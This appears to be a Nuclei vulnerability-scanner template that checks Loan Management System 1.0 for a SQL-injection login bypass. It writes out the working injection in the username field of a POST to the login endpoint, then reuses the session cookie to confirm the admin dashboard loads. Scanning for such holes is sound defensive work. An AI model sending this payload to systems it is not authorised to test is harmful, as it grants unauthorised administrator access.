id: loancms-sqli info: name: Loan Management System 1.0 - SQLi Authentication Bypass author: arafatansari severity: high description: | Loan Management System Login page can be bypassed with a simple SQLi to the username parameter. reference: - https://www.exploit-db.com/exploits/50402 metadata: verified: true tags: edb,loancms,sqli,auth-bypass,cms requests: - raw: - | POST /ajax.php?action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=admin'+or+'1'%3D'1'%23&password=nuclei - | GET /index.php?page=home HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - 'window.start_load' - 'Welcome back Admin' - 'Loan Management System' condition: and - type: word part: body words: - 'login-form' negative: true